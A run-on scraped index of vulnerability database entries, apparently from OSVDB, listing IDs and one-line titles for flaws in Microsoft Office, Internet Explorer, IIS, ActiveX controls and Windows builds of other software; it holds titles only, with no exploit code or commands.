Microsoft Office Excel FNGROUPNAME Record Handling Memory Corruption [62820] Microsoft Office Excel Workbook Globals Stream MDXSET Record Handling Overflow [62819] Microsoft Office Excel MDXTUPLE Record Handling Overflow [62818] Microsoft Office Excel Sheet Object Type Confusion Arbitrary Code Execution [62817] Microsoft Office Excel File Record Handling Unspecified Memory Corruption [62810] Microsoft IE iepeers.dll Use-After-Free Arbitrary Code Execution [62751] Apple Safari on Windows CFNetwork cfnetwork.dll Multiple Element Remote DoS [62587] Hitachi JP1/Cm2/Network Node Manager Remote Console on WIndows File Permission Weakness Unspecified Local Privilege Escalation [62547] Adobe getPlus DLM (Download Manager) on Windows getPlus Downloader Software Installation Authorization Weakness [62466] Microsoft IE CSS Stylesheet Cross-origin Information Disclosure [62438] Google Gadget ActiveX Microsoft ATL Template Unspecified Arbitrary Code Execution [62400] Microsoft Wordpad Malformed RTF File Parsing Memory Exhaustion DoS [62309] Google Chrome on Windows Shortcut Character Escaping Arbitrary Program Execution [62246] Microsoft Data Analyzer ActiveX Web Page Handling Unspecified Arbitrary Code Execution [62241] Microsoft Office Powerpoint TextBytesAtom Record Handling Remote Code Execution [62240] Microsoft Office Powerpoint TextCharsAtom Record Handling Remote Code Execution [62239] Microsoft Office Powerpoint File Path Handling Overflow [62238] Microsoft Office Powerpoint LinkedSlideAtom Handling Remote Code Execution [62237] Microsoft Office Powerpoint OEPlaceholderAtom placementId Parameter Handling Remote Code Execution [62236] Microsoft Office Powerpoint msofbtClientData Container OEPlaceholderAtom Use After Free Remote Code Execution [62235] Microsoft Office Excel MSO.DLL OfficeArtSpgr Container Overflow [62229] Microsoft IIS Crafted DNS Response Inverse Lookup Log Corruption XSS [62221] OpenSolaris Default Configuration smbadm Windows Active Directory Domain Joining Unspecified Issue [62220] OpenSolaris Default Configuration kclient Windows Active Directory Domain Joining Unspecified Issue [62157] Microsoft IE text/html Content Type URLMON Sniffing Arbitrary File Access [62156] Microsoft IE Dynamic OBJECT Tag Cross-domain Arbitrary File Access [61914] Microsoft IE Javascript Cloned DOM Object Handling Memory Corruption [61913] Microsoft IE HTML Object Handling Unspecified Memory Corruption [61912] Microsoft IE Baseline Tag Rendering Memory Corruption [61911] Microsoft IE Table Layout Reuse Memory Corruption [61910] Microsoft IE Table Layout Col Tag Cache Update Handling Memory Corruption [61909] Microsoft IE Unspecified Crafted URL Handling Arbitrary Code Execution [61908] Cisco InternetWork Performance Monitor on Windows getProcessName CORBA GIOP Request Overflow [61906] Adobe Flash Player on Windows ActiveX Unspecified Arbitrary Remote Code Execution [61905] Adobe Flash Player on Windows Use-after-free Movie Unloading Memory Corruption [61697] Microsoft IE mshtml.dll Use-After-Free Arbitrary Code Execution (Aurora) [61525] Microsoft Commerce Server ADMINDBPS Registry Key Encoded Password Local Disclosure [61516] Apple Safari for Windows search-ms Protocol Handler Arbitrary Program Execution [61432] Microsoft IIS Colon Safe Extension NTFS ADS Filename Syntax Arbitrary Remote File Creation [61294] Microsoft IIS ASP Crafted semicolon Extension Security Bypass [61249] Microsoft IIS ctss.idc table Parameter SQL Injection [61203] GTK+ gdk/gdkwindow.c gdk_window_begin_implicit_paint() Function Foreign Windows Weakness [60891] Adobe Flash Player ActiveX on Windows Unspecified Arbitrary File Access [60839] Microsoft IE CAttrArray Object Circular Dereference Remote Code Execution [60838] Microsoft IE CSS Element Access Race Condition Memory Corruption [60837] Microsoft IE XHTML DOM Manipulation Memory Corruption [60834] Microsoft WordPad / Office Text Converters Word97 File Handling Memory Corruption [60830] Microsoft Office Project File Handling Memory Validation Arbitrary Code Execution [60804] Novell iPrint Client on Windows Unspecified Time Information Overflow [60803] Novell iPrint Client on Windows ienipp.ocx target-frame Parameter Handling Overflow [60660] Microsoft IE Response-Changing Mechanism Output Encoding XSS [60587] Windows File Sharing Samba Client Resource Exhaustion DoS [60578] Windows 2000 Subnet Bandwidth Manager RSVP Server Authority Hijacking [60510] SugarCRM on Windows .htaccess Direct Request Arbitrary File Access [60504] Microsoft IE PDF Export Title Property File Path Disclosure [60490] Microsoft IE Layout STYLE Tag getElementsByTagName Method Handling Memory Corruption [60437] PHP on Windows popen Invalid Mode Handling DoS [60401] Microsoft IE Crafted DHTML AnchorClick Attribute Handling Remote DoS [60397] Microsoft Outlook HTML Email CODEBASE Parameter Arbitrary Program Execution [60370] PGP PGPDisk Windows User Switching Cross-user Plaintext Information Disclosure [60317] HP Operations Manager on Windows Unspecified Access Restriction Bypass [60295] Microsoft IE Image ICC Profile Tag Count Handling DoS [60294] Microsoft MSN Messenger Image ICC Profile Tag Count Handling DoS [60285] Apple QuickTime / Darwin Streaming Server on Windows parse_xml.cgi filename Parameter Traversal Arbitrary File Access [60282] Microsoft Pocket IE (PIE) object.innerHTML Function Remote DoS [60198] Microsoft IE DHTML Property setHomePage Method JavaScript Loop Remote DoS [60176] Apache Tomcat Windows Installer Admin Default Password [60134] Netscape sun.awt.windows.WDefaultFontCharset Java Class WDefaultFontCharset Constructor Overflow [60047] SecureClean Windows Alternatve Data Stream Information Disclosure [60046] PGP Data Wipe Windows Alternatve Data Stream Information Disclosure [60045] Sami Tolvanen Eraser Windows Alternatve Data Stream Information Disclosure [60044] East-Tec Eraser 2002 Windows Alternatve Data Stream Information Disclosure [60043] BCWipe Windows Alternatve Data Stream Information Disclosure [60020] Microsoft Visual C++ MFC Static Library ISAPI Extension (Isapi.cpp) CHttpServer::OnParseError Overflow [60004] Microsoft SQL Server Multiple Stored Procedure Unprivileged Configuration Manipulation [59996] Apple Mac OS X QuickLook Crafted Microsoft Office Document Handling Overflow [59968] Microsoft Multiple Products SSL / TLS Renegotiation Handshakes MiTM Plaintext Data Injection [59915] Sun Java SE Swing Implementation Windows Pluggable Look and Feel (PL&amp [59907] MySQL on Windows bind-address Remote Connection Weakness [59906] MySQL on Windows Default Configuration Logging Weakness [59892] Microsoft IIS Malformed Host Header Remote DoS [59886] Microsoft Exchange Malformed Microsoft Remote Procedure Call (MSRPC) Remote DoS [59866] Microsoft Office Excel Document Record Parsing Memory Corruption [59864] Microsoft Office Excel Malformed Record Object Sanitization Failure Arbitrary Code Execution [59863] Microsoft Office Excel Formula Handling Pointer Corruption Arbitrary Code Execution [59862] Microsoft Office Excel Cell Embeded Formula Parsing Memory Corruption [59861] Microsoft Office Excel BIFF Record Parsing Overflow [59860] Microsoft Office Excel BIFF File FEATHEADER cbHdrData Size Element Handling Memory Corruption [59859] Microsoft Office Excel SxView Record Handling Memory Corruption [59858] Microsoft Office Excel Malformed PivotCache Stream Handling Memory Corruption [59857] Microsoft Office Word Document Malformed File Information Block (FIB) Parsing Memory Corruption [59826] vqSoft vqServer for Windows DOS Filename Request Access Bypass [59808] Microsoft Exchange Request Saturation License Exhaustion Remote DoS [59774] Multiple Antivirus Microsoft Exchange Malformed E-mail X Header Scan Bypass [59718] Sun Java JDK / JRE on Windows Update Notification Weakness [59688] Novell NetWare Client on Windows Help Feature Login Authentication Bypass [59653] Microsoft MN-500 Backup Function Cleartext Credential Local Disclosure [59636] Microsoft SQL Server SQL Authentication Password Encryption Weakness [59635] My Remote File Server on Windows Permission Weakness Local Privilege Escalation [59621] Microsoft IIS CodeBrws.asp Off-By-One File Check Bypass Source Disclosure [59615] ProxyView Embedded Windows NT Default Admin Account Password [59563] Microsoft Baseline Security Analyzer (MBSA) Security Scan Result Cleartext Local Disclosure [59561] Microsoft IIS CodeBrws.asp Encoded Traversal Arbitrary File Source Disclosure [59503] Microsoft IE Rendering Engine Crafted MIME Type Arbitrary Script Execution [59502] Microsoft IE / Outlook Express Crafted XML Stylesheet (XSL) Arbitrary Script Execution [59501] Microsoft IE MSScriptControl.ScriptControl / GetObject Frame Domain Validation Bypass [59500] Microsoft IE HTML Parser (MSHTML.DLL) Browser Window Object Handling DoS [59479] Microsoft Office SharePoint Server Team Services _layouts/download.aspx Multiple Parameter ASP.NET Source Disclosure [59360] Microsoft IIS ASP Page Visual Basic Script Malformed Regex Parsing DoS [59326] Napster Client on Windows Message Handling Overflow [59323] Microsoft IE Active Movie ActiveX Arbitrary File Download [59322] Microsoft Jet Database Crafted Query Arbitrary Command Execution [59289] Microsoft Java Virtual Machine getSystemResourceAsStream Function Arbitrary File Access [59263] Microsoft IE IMG Tag width Handling DoS [59259] Microsoft Site Server / Commercial Internet System (MCIS) Cookie Expiry Weakness [59258] Microsoft Exchange ACL Modification Update Weakness [59253] Windows File Sharing for Apple Mac OS X Improper Shutdown Unspecified Issue [59249] Windows NT Unprivileged Local Share Manipulation [59101] Oracle Database on Windows Net Foundation Layer Unspecified Remote Issue [59066] IBM Rational AppScan on Windows Help Pages Query String XSS [58907] Adobe Reader / Acrobat on Windows ActiveX Unspecified DoS [58878] Skype Extras Manager on Windows Unspecified Issue [58874] Microsoft IE CSS Parsing writing-mode Style Memory Corruption [58873] Microsoft IE DOM Copy Constructor Event Object Initialization Memory Corruption [58872] Microsoft IE HTML Component Handling Arbitrary Code Execution [58871] Microsoft IE Data Stream Header Corruption Arbitrary Code Execution [58870] Microsoft Office BMP Image Color Processing Overflow [58869] Microsoft Office Malformed Object Handling Memory Corruption Arbitrary Code Execution [58868] Microsoft Multiple Products GDI+ PNG Image Handling Integer Overflow [58867] Microsoft Multiple Products GDI+ .NET API Code Execution Privilege Escalation [58866] Microsoft Multiple Products GDI+ TIFF Image Handling Memory Corruption Arbitrary Code Execution [58865] Microsoft Multiple Products GDI+ TIFF Image Handling Overflow [58864] Microsoft Multiple Products GDI+ PNG Image Handling Heap Overflow [58863] Microsoft Multiple Products GDI+ WMF Image Handling Overflow [58851] Microsoft .NET Framework / Silverlight Crafted Application Memory Manipulation Arbitrary Code Execution [58850] Microsoft .NET Framework Object Casting Manipulation Arbitrary Code Execution [58849] Microsoft .NET Framework Crafted Application Managed Pointer Access Arbitrary Code Execution [58817] Microsoft IE Nested marquee Tag Handling DoS [58788] Microsoft IE Crafted File Extension Download Security Warning Bypass [58736] Jetty on Windows Double Slash (//) Path Aliasing Unspecified Issue [58656] Trend Micro ServerProtect for Windows EarthAgent.exe Multiple RPC Functions Remote Overflow [58536] Hart InterCivic EMS Windows Registry Ballot Now Database Private Key Disclosure [58480] Microsoft IE X.509 Certificate Authority (CA) Common Name Null Byte Handling SSL MiTM Weakness [58403] avast! Home / Professional for Windows avast4.ini ashWsFtr.dll Subversion Local Privilege Escalation [58399] Microsoft IE window.print Function Loop Remote DoS [58397] Microsoft IE Auto Form Submission KEYGEN Element Remote DoS [58350] Microsoft Patterns &amp [58253] HP ProCurve Identity Driven Manager on Windows Unspecified Local Privilege Escalation [58188] PHP on Windows popen Invalid Mode Handling DoS [58127] CreativeLabs es1371mp.sys WDM Audio Driver on Windows IRP Request Handling Local Privilege Escalation [58104] Xerver on Windows HTTP Server ::$DATA Extension Request Arbitrary File Access [58092] Diebold Global Election Management System (GEMS) Server Windows Access Database Corruption DoS [58013] OpenOffice.org (OOo) on Windows Unspecified Client-side Issue [58012] OpenOffice.org (OOo) on Windows Unspecified Client-side Stack Overflow [58009] OpenOffice.org (OOo) on Windows Unspecified Client-side Issue [57959] Interstage Application Server HTTP Server on Windows Unspecified Crafted Request DoS [57955] Samba Unconfigured Home Directory Windows File Share Directory Access Restriction Bypass [57942] SAP NetWeaver on Windows Unspecified Overflow [57941] SAP NetWeaver on Windows Unspecified NULL Dereference DoS [57940] SAP NetWeaver on Windows Unspecified Information Disclosure [57926] Symantec Altiris Deployment Solution on Windows Unspecified Client-side Issue (3) [57925] Symantec Altiris Deployment Solution on Windows Unspecified Client-side Issue (2) [57924] Symantec Altiris Deployment Solution on Windows Unspecified Client-side Issue (1) [57906] Perforce Server on Windows P4S.EXE Unspecified Infinite Loop DoS [57905] Perforce Server on Windows P4S.EXE Unspecified DoS (2) [57904] Perforce Server on Windows P4S.EXE Unspecified DoS (1) [57881] MailSite on Windows LDAP3A.exe Unspecified Heap Corruption [57880] MailSite on Windows LDAP3A.exe Unspecified Remote DoS [57872] IBM Tivoli Directory Server (TDS) on Windows ibmslapd.exe Unspecified NULL Dereference Remote DoS [57853] Business Objects Crystal Reports Server on Windows Unspecified Infinite Loop DoS [57804] Microsoft JScript Scripting Engine Memory Corruption Arbitrary Code Execution [57753] Microsoft IIS FTP Server Crafted Recursive Listing Remote DoS [57742] Microsoft SQL Cleartext User Passwords Disclosure [57740] X Windows (X11R4) -L Linked Binary Path Subversion Handling Local Privilege Escalation [57730] X Windows (X11R3/4) xterm Emulator Escape Sequence Handling Remote Privilege Escalation [57654] Microsoft IE JavaScript LI Element Creation Value Attribute Handling Remote DoS [57643] Quick Heal AntiVirus on Windows Unspecified Overflow [57638] Microsoft Outlook Express IMAP Client literal_size Remote Overflow [57616] DECwindows on Ultrix Memory Persistent Cleartext Credential Disclosure [57589] Microsoft IIS FTP Server NLST Command Remote Overflow [57515] Microsoft IE window.open() New Window URL Path Spoofing Weakness [57506] Microsoft IE location.hash Javascript Handling Remote DoS [57500] Sophos PureMessage for Microsoft Exchange Scan Engine Load Handling Scan Protection Bypass [57499] Sophos PureMessage for Microsoft Exchange EdgeTransport.exe TNEF-Encoded Message Cleartext Conversion DoS [57493] Sophos PureMessage Scanner (PMScanner.exe) for Microsoft Exchange Crafted File Handling DoS [57202] Serv-U FTP Server Windows Authenticated HTTP Session Termination Failure Weakness [57196] Serv-U FTP Server Windows Authentication Non-secure Login Weakness [57142] Microsoft IE Malformed DIV / SCRIPT Element Handling DoS [57118] Microsoft IE onblur() / onfocusout() Functions Nested Loop DoS [57113] Microsoft IE Extended HTML Form Non-HTTP Protocol XSS [57064] Microsoft IE Crafted UTF-7 Context XSS Filter Bypass [57063] Microsoft IE Multiple CRLF Injected HTTP Header XSS Filter Bypass [57062] Microsoft IE STYLE Element / CSS Expression Property Double Content Injection XSS Filter Bypass [56963] Sun Java SE Abstract Window Toolkit (AWT) on Windows 2000 Security Warning Icon Display Weakness [56916] Microsoft Office Web Components HTMLURL Parameter ActiveX Spreadsheet Object Handling Overflow [56915] Microsoft Office Web Components OWC10.Spreadsheet ActiveX BorderAround() Method Heap Corruption Arbitrary Code Execution [56914] Microsoft Office Web Components OWC10 ActiveX Loading/Unloading Memory Allocation Arbitrary Code Execution [56911] Microsoft Remote Desktop Server (RDS) mstscax.dll Packet Parsing Remote Overflow [56910] Microsoft Visual Studio Active Template Library (ATL) Header Mismatch Remote Code Execution [56905] Microsoft .NET Framework Request Scheduling Crafted HTTP Request Remote DoS [56852] Microsoft IE XML Document start-tags Handling CPU Consumption DoS [56779] Microsoft IE mshtml.dll JavaScript findText Method Unicode String Handling DoS [56741] MySQL Connector/J Unicode w/ SJIS/Windows-31J Charset SQL Injection [56699] Microsoft Visual Studio Active Template Library (ATL) String Manipulation Arbitrary Memory Disclosure [56698] Microsoft Visual Studio Active Template Library (ATL) Data Stream Object Instantiation Remote Code Execution [56696] Microsoft Visual Studio Active Template Library (ATL) Headers VariantClear Corrupt Stream Handling Remote Code Execution [56695] Microsoft IE HTML Embedded CSS Property Modification Memory Corruption [56694] Microsoft IE Invalid HTML Object Element Appendage Handling Memory Corruption [56693] Microsoft IE timeChildren Object ondatasetcomplete Event Method Memory Corruption [56525] Microsoft Eyedog ActiveX Unspecified Overflow [56489] Microsoft IE Proxy Server CONNECT Response Cached Certificate Use MiTM HTTPS Site Spoofing [56485] Microsoft IE iFrame HTTP / HTTPS Content Detection Weakness [56480] Microsoft IE HTTP Response Refresh Header javascript: URI XSS [56474] Microsoft IIS WebDAV Extension URL Decode Crafted HTTP Request Authentication Bypass [56438] Microsoft XML Core Services Set-Cookie HTTP Response Header Restriction Weakness [56434] Web On Windows (WOW) ActiveX 2 Multiple Method Arbitrary Command Execution [56432] Microsoft IE onclick Action Mouse Click Subversion (Clickjacking) [56424] GoAhead WebServer on Windows MS-DOS Device Name Request DoS [56331] MapServer on Windows mapserv mapserv.c id Parameter Traversal Arbitrary File Access [56323] Microsoft IE Write Method Unicode String Argument Handling Remote DoS [56272] Microsoft Video ActiveX (msvidctl.dll) Unspecified Remote Arbitrary Code Execution [56254] Microsoft IE Select Object Length Property Handling Memory Consumption DoS [56015] NTP on Windows SO_EXCLUSIVEADDRUSE Unspecified Issue [55940] EiffelStudio on Windows IPv6 Listening Mode IPv4 Interface Traffic Disclosure [55855] Microsoft IE AddFavorite Method URL Handling Remote DoS [55845] Microsoft DirectX DirectShow quartz.dll QuickTime NumberOfEntries Field Memory Corruption [55844] Microsoft DirectX DirectShow QuickTime File Pointer Validation Arbitrary Code Execution [55838] Microsoft Office Publisher PUBCONV.DLL Legacy Format Importation Pointer Dereference Arbitrary Code Execution [55837] Microsoft Virtual PC / Virtual Server Instruction Decoding Unspecified Local Privilege Escalation [55836] Microsoft ISA Server 2006 Radius OTP Security Bypass [55806] Microsoft Office Web Components OWC10.Spreadsheet ActiveX msDataSourceObject() Method Memory Corruption [55651] Microsoft DirectShow Video Streaming ActiveX (msvidctl.dll) IMPEG2TuneRequest DirectX Object Interface Overflow [55509] VLC Media Player for Windows modules/access/smb.c Win32AddConnection() Function Overflow [55436] Motorola Timbuktu Pro for Windows PlughNTCommand Named Pipe String Handling Overflow [55345] Microsoft libc src/lib/libc/gen/fts.c fts_build() Function fts Nested Directory Handling Local DoS [55298] XEmacs on Windows glyphs-eimage.c Multiple Function Image File Handling Overflows [55269] Microsoft IIS Traversal GET Request Remote DoS [55227] CA ARCserve Backup for Windows Message Engine 0x3B Message Invalid Stub Data RPC Marshalling Error Remote DoS [55226] CA ARCserve Backup for Windows Message Engine ASCORE Module 0x13 Message Handling Remote DoS [55224] PHP on Windows Multiple Function safe_mode Bypass [55129] Microsoft IE HTTP Host Header Proxy Server CONNECT Response Document Context SSL Tampering Weakness [55021] Apple Safari on Windows Installer Application Launch Unspecified Compression Method Local Privilege Escalation [55012] Apple Safari on Windows Reset Safari Implementation Stored Web Password Persistence [54974] Apple Safari on Windows CoreGraphics TrueType Font Handling Memory Corruption [54966] PeaZIP on Windows ZIP Filename Handling Arbitrary Command Execution [54960] Microsoft Office Word Malformed Record Handling Overflow (2009-0565) [54959] Microsoft Office Word Malformed Length Field Handling Overflow (2009-0563) [54958] Microsoft Office Excel BIFF File QSIR Record Object Pointer Handling Remote Code Execution [54957] Microsoft Office Excel File SST Record Handling String Parsing Overflow [54956] Microsoft Office Excel Record Object Field Sanitization Memory Corruption [54955] Microsoft Office Excel Malformed Records Handling Overflow [54954] Microsoft Office Excel Record Parsing Array Indexing Memory Corruption [54953] Microsoft Office Excel Malformed Object Record Corruption Remote Code Execution [54952] Microsoft Office Excel Malformed Record Object Pointer Handling Remote Code Execution (2009-0549) [54951] Microsoft IE Crafted HTML Malformed Row Property References Memory Corruption [54950] Microsoft IE Crafted onreadystatechange Event Memory Corruption [54949] Microsoft IE Crafted HTML Document Node Addition Event Handler Memory Corruption [54948] Microsoft IE setCapture Function Object Handling Uninitialized Memory Corruption [54947] Microsoft IE Crafted AJAX XMLHttpRequest Synchronization Memory Corruption [54946] Microsoft IE DHTML tr Element Handling Crafted Method Memory Corruption [54945] Microsoft IE Cached Data Handling Cross-Domain Information Disclosure [54944] Microsoft IE Race Condition Cross-Domain Information Disclosure [54922] VMware Multiple Products on Windows Descheduled Time Accounting Driver Unspecified DoS [54875] Apple QuickTime on Windows Movie File Clipping Region (CRGN) Atom Parsing Overflow [54797] Microsoft DirectX DirectShow quartz.dll QuickTime NULL Byte Overwrite Arbitrary Code Execution [54709] Soulseek on Windows Search Query Handling Overflow [54700] Microsoft GDI+ gdiplus.dll GpFont:etData Function Crafted EMF File Handling Off-by-one Overflow [54555] Microsoft IIS WebDAV Unicode URI Request Authentication Bypass [54444] Apple Mac OS X Microsoft Office Spotlight Importer File Handling Memory Corruption [54394] Microsoft Office PowerPoint Multiple Record Types Handling Overflow [54393] Microsoft Office PowerPoint CurrentUserAtom Atom Parsing Multiple Overflows [54392] Microsoft Office PowerPoint Unspecified Crafted File Handling Heap Corruption [54391] Microsoft Office PowerPoint OutlineTextRefAtom Parsing Memory Corruption Arbitrary Code Execution [54390] Microsoft Office PowerPoint BuildList Record Parsing Memory Corruption Arbitrary Code Execution [54389] Microsoft Office PowerPoint PP7 Crafted File Handling Memory Corruption Arbitrary Code Execution (2009-1128) [54388] Microsoft Office PowerPoint PP7 Crafted File Handling Memory Corruption Arbitrary Code Execution (2009-0225) [54387] Microsoft Office PowerPoint PPT95 Import (PP7X32.DLL) File Handling Multiple Overflows [54386] Microsoft Office PowerPoint PPT Importer (PP4X32.DLL) Legacy File Format Handling Multiple Overflows [54385] Microsoft Office PowerPoint Conversion Filter (PP4X32.DLL) String Parsing Memory Corruption Arbitrary Code Execution [54384] Microsoft Office PowerPoint Conversion Filter (PP4X32.DLL) Structure Parsing Memory Corruption Arbitrary Code Execution (2009-0227) [54383] Microsoft Office PowerPoint Conversion Filter (PP4X32.DLL) Structure Parsing Memory Corruption Arbitrary Code Execution (2009-0223) [54382] Microsoft Office PowerPoint Legacy File Format Handling Unspecified Remote Code Execution (2009-0222) [54381] Microsoft Office PowerPoint Legacy File Format Handling Unspecified Remote Code Execution (2009-1137) [54292] Microsoft ActiveSync RNDIS over USB System Lock Bypass [54183] Microsoft IE Unprintable Character Document Handling DoS [53935] Xitami Web Server on Windows HTTP Request Connection Saturation Remote DoS [53933] Microsoft Whale Client Components ActiveX (WhlMgr.dll) Multiple Method Overflow [53929] Apache Geronimo on Windows Security/Keystores Portlet Traversal Arbitrary File Upload [53928] Apache Geronimo on Windows Embedded DB/DB Manager Portlet Traversal Arbitrary File Upload [53927] Apache Geronimo on Windows Services/Repository Portlet Traversal Arbitrary File Upload [53890] Trend Micro OfficeScan Client on Windows NTRtScan.exe Directory Pathname Handling Local DoS [53871] OpenX on Windows www/delivery/tjs.php trackerid Parameter Traversal Arbitrary File Deletion [53750] Oracle Outside In Technology Microsoft Office File Optional Data Stream Parsing Overflow [53749] Oracle Outside In Technology Microsoft Office Spreadsheet Record Handling Overflow (2009-1010) [53748] Oracle Outside In Technology Microsoft Excel Spreadsheet Record Handling Remote Overflow (2009-1009) [53695] VMware Multiple Products on Windows hcmon.sys Crafted IOCTL Handling Unspecified Local DoS [53671] Wireshark on Windows LDAP Dissector Unspecified DoS [53665] Microsoft Office Excel Malformed Object Handling Memory Corruption [53664] Microsoft WordPad Word 97 Text Converter File Handling Overflow [53663] Microsoft Office Word 2000 WordPerfect 6.x Converter Document Handling Stack Corruption [53662] Microsoft WordPad / Office Text Converter Malformed Data Handling Memory Corruption [53637] Microsoft ISA Server / Forefront Threat Management Gateway (TMG) Forms Authentication Component Unspecified XSS [53636] Microsoft ISA Server / Forefront Threat Management Gateway (TMG) Web Proxy TCP State Handling DoS [53632] Microsoft DirectShow MJPEG Decompression Unspecified Arbitrary Code Execution [53627] Microsoft IE Unitialized Object Memory Corruption Arbitrary Code Execution (2009-0554) [53626] Microsoft IE EMBED Element Handling Memory Corruption Arbitrary Code Execution [53625] Microsoft IE Unitialized Object Memory Corruption Arbitrary Code Execution (2009-0552) [53624] Microsoft IE Page Transition Unspecified Memory Corruption Arbitrary Code Execution [53454] Sybase Enterprise Application Server on Windows Crafted Request WEB-INF Directory Information Disclosure [53453] Pramati Server on Windows Crafted Request WEB-INF Directory Information Disclosure [53451] jo! jo Webserver on Windows Crafted Request WEB-INF Directory Information Disclosure [53450] HP Application Server on Windows Crafted Request WEB-INF Directory Information Disclosure [53340] Microsoft IE JavaScript Implementation Web Site Temporary Footprint Spoofing Weakness [53308] Apple Safari on Windows WebKit.dll ALINK Attribute Handling Memory Exhaustion DoS [53306] Microsoft Money prtstb06.dll ActiveX Startup Property Remote DoS [53231] Apple Safari on Windows XML Document Handling Application Crash DoS [53182] Microsoft Office PowerPoint PPT File Handling Unspecified Code Execution [53072] Citrix Presentation Server Client for Windows Process Memory Credential Information Disclosure [52924] Microsoft IIS WebDAV PROPFIND Method Forced Directory Listing [52898] Apple Safari for Windows feeds: URI Handling NULL Pointer Dereference DoS [52896] Mozilla Firefox on Windows _moveToEdgeShift() XUL Tree Method Garbage Collection Arbitrary Code Execution (PWN2OWN) [52830] HP Virtual Rooms Client on Windows Unspecified Arbitrary Remote Code Execution [52745] Adobe Flash Player on Windows Mouse Pointer Display Unspecified Clickjacking [52695] Microsoft Office Excel Crafted Document Invalid Object Reference Unspecified Code Execution [52692] Microsoft SMB NT Trans2 Request Parsing Unspecified Remote Code Execution [52691] Microsoft SMB NT Trans Request Parsing Overflow Remote Code Execution [52690] Microsoft Office Word Malformed Table Property Handling Memory Corruption [52689] Microsoft Word Document Handling HTML Object Tag DoS [52688] Microsoft Word Document Handling HTML Object Tag XSS [52686] Microsoft Office Hyperlink Target Digital Signatures Weakness [52684] Microsoft Forms Multiple ActiveX (FM20.dll) Memory Access Violations [52680] Microsoft IIS httpext.dll WebDav LOCK Method Nonexistent File Request Parsing Memory Exhaustion Remote DoS [52671] Microsoft IE shell32 Module Unspecified Form Data Handling Overflow [52670] Microsoft IE Double Injection Bypass Anti-XSS Filter Bypass [52669] Microsoft IE UTF-7 Character Set Bypass Anti-XSS Filter Bypass [52668] Microsoft IE CRLF Injection Multiple Method Bypass Anti-XSS Filter Bypass [52667] Microsoft IE navcancl.htm Local Resource Refresh Link XSS [52666] Microsoft IE Malformed file:// URI Handling DoS [52665] Microsoft IE IObjectSafety Functionality Object Creation Call DoS [52664] Microsoft IE Relative Path Handling Spoofing Weakness [52663] Microsoft IE Crafted Pop-up Directional Address Bar Spoofing [52660] Microsoft IE about:blank Blank Tab Spoofing Weakness [52599] IBM WebSphere Application Server (WAS) on Windows JSP Handling Unspecified Exposure (PK75248) [52530] IBM Tivoli Storage Manager HSM for Windows Unspecified Overflow [52491] Apple Safari for Windows Multiple Protocol Handler Null Dereference DoS [52490] Apple Safari for Windows http URI Handler Malformed Domain Name DoS [52468] IBM WebSphere Application Server (WAS) on Windows Installation Factory logs/instconfigifwas6.log Local Information Disclosure [52301] NovaNET on Windows nnwindtb.dll DtbClsLogin Function Overflow DoS [52287] Theme Engine for Drupal on Windows q Parameter Local File Inclusion [52238] Microsoft IIS IDC Extension XSS [51840] Microsoft IE XHTML Strict Mode CSS Handling Memory Corruption Arbitrary Code Execution [51839] Microsoft IE Document Object Handling Memory Corruption Arbitrary Code Execution [51838] Microsoft Exchange Server EMSMDB2 Invalid MAPI Command Remote DoS [51837] Microsoft Exchange Server Message Transport Neutral Encapsulation Format (TNEF) Decoding Remote Code Execution [51836] Microsoft Office Visio File Opening Memory Functions Arbitrary Code Execution [51835] Microsoft Office Visio Object Data Memory Functions Arbitrary Code Execution [51834] Microsoft Office Visio File Opening Object Data Handling Arbitrary Code Execution [51531] Apple QuickTime MPEG-2 Playback Component on Windows Crafted Movie File Handling Arbitrary Code Execution [51503] Microsoft Word Save as PDF Add-on Emailed PDF Path Disclosure [51406] Silentum Uploader on Windows upload.php delete Parameter Traversal Arbitrary File Deletion [51351] Oracle Database SQLPlus Windows GUI Unspecified Remote Information Disclosure (2008-3973) [51350] Oracle Database SQLPlus Windows GUI Unspecified Remote Information Disclosure (2008-5439) [51320] Microsoft IE chromehtml: URI --renderer-path Option Arbitrary Command Execution [51277] Microsoft Excel HTML Tag Interpretation XSS [51259] Microsoft IE onload=screen[&quot [51226] IBM AS/400 iSeries Access for Windows Remote Command rexec Remote Command Execution [51190] Firefly Media Server (mt-daapd) on Windows Traversal Arbitrary /admin-root File Disclosure [51135] Google Chrome on Windows chromehtml: URI--renderer-path Option Arbitrary Remote Command Execution [50978] Opera on Windows Malformed Email Header Handling Resource Consumption DoS [50974] Microsoft Outlook Express InetComm.dll MimeOleClearDirtyTree Function Malformed Email Header Handling Infinite Loop DoS [50959] Microsoft Word / Publisher Malformed wordart Handling DoS [50778] Microsoft Remote Help SAFRCFileDlg.RASetting ActiveX (safrcdlg.dll) GetProfileString Function Overflow [50745] Microsoft Office Web Controls OWC11.DataSourceControl Memory Access Violation [50727] Hitachi JP1/Integrated Management Service Support on Windows Unspecified XSS [50693] Sun Ray Windows Connector Unspecified Local Administration Password Disclosure [50683] CA ARCserve Backup on Windows LDBserver Service Client Data Verification Weakness [50622] Microsoft IE mshtml.dll XSML Nested SPAN Element Handling Unspecified Arbitrary Code Execution [50615] Microsoft ASP.NET Malformed File Request Path Disclosure [50613] Microsoft IE WebDAV Cached Content Request Parsing Overflow [50612] Microsoft IE Object Handling Uninitialized Memory Corruption [50611] Microsoft IE Navigation Methods Parameter Validation Memory Corruption [50610] Microsoft IE EMBED Tag File Name Extension Overflow [50598] Microsoft Office Word Table Property Handling Overflow [50597] Microsoft Office Word RTF Object Parsing Arbitrary Code Execution (2008-4031) [50596] Microsoft Office Word RTF Object Parsing Arbitrary Code Execution (2008-4030) [50595] Microsoft Office Word RTF Drawing Object Parsing Overflow [50593] Microsoft Office Word RTF Consecutive Drawing Object Parsing Memory Corruption [50592] Microsoft Office Word Malformed Value Memory Corruption [50591] Microsoft Office Word RTF Polyline/Polygon Object Parsing Overflow [50590] Microsoft Office Word Malformed File Information Block (FIB) lcbPlcfBkfSdt' Field Memory Corruption [50589] Microsoft SQL Server 2000 sp_replwritetovarbin() Stored Procedure Overflow [50585] Microsoft Office SharePoint Server Administrative URL Security Bypass [50581] Microsoft Visual Basic Charts Control ActiveX (Mschrt20.ocx) Unspecified Memory Corruption [50580] Microsoft Visual Basic Animation ActiveX (mscomct2.ocx) AVI Parsing Memory Corruption [50579] Microsoft Visual Basic Hierarchical FlexGrid ActiveX (mshflxgd.ocx) Multiple Method Memory Corruption [50578] Microsoft Visual Basic FlexGrid ActiveX (msflxgrd.ocx) Unspecified Memory Corruption [50577] Microsoft Visual Basic DataGrid ActiveX (msdatgrd.ocx) Unspecified Memory Corruption [50557] 